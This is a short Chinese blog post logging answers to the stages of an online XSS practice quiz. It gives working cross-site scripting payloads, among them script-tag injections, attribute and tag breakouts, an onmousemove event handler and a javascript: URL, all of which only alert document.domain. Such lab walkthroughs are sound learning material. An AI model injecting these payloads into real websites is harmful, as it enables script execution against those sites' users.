XSS游戏(http://xss-quiz.int21h.jp)记录

Stage 1

<script>alert(document.domain);</script>

Stage 2

闭合标签

”><script>alert(document.domain);<

Stage 3

Japan</option><script>alert(document.domain)</script>




Stage 4


注意隐藏属性



Stage 5

客户端限制,抓包修改,闭合input



Stage 6

限制了<>,利用事件进行触发




Stage 7


view plaincopyprint  onmousemove=alert(document.domain)




Stage 8

javascript:alert(document.domain);

Stage 9



最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 常见试题 行内元素:会在水平方向排列,不能包含块级元素,设置width无效,height无效(可以设置line-h...
    他大舅啊阅读 2,498评论 1 5
  • XSS 重要的是根据输出来判断过滤器的规则,F12,构造自己的XSS Payload,分割,关闭括号,错误后判断过...
    g0阅读 1,645评论 0 0
  • 转眼又是一年的7月,毕业季来临。 曾经的7月,你看着师兄师姐忙碌的拍毕业照,举行毕业典礼,现在也终于轮到自己了。 ...
    丝士丰阅读 277评论 0 1
  • 这个系列是主题为「简明哲学小史」的读书笔记。含以下五篇—— 简明哲学小史 00 - 简介 简明哲学小史 01 - ...
    EncyKe阅读 663评论 0 0
  • 文/管子 婴孩儿眷恋母亲的乳头,久久不肯松开他那肉嘟嘟的小嘴唇。似乎,从母亲孕育我...
    管子姐姐阅读 427评论 0 1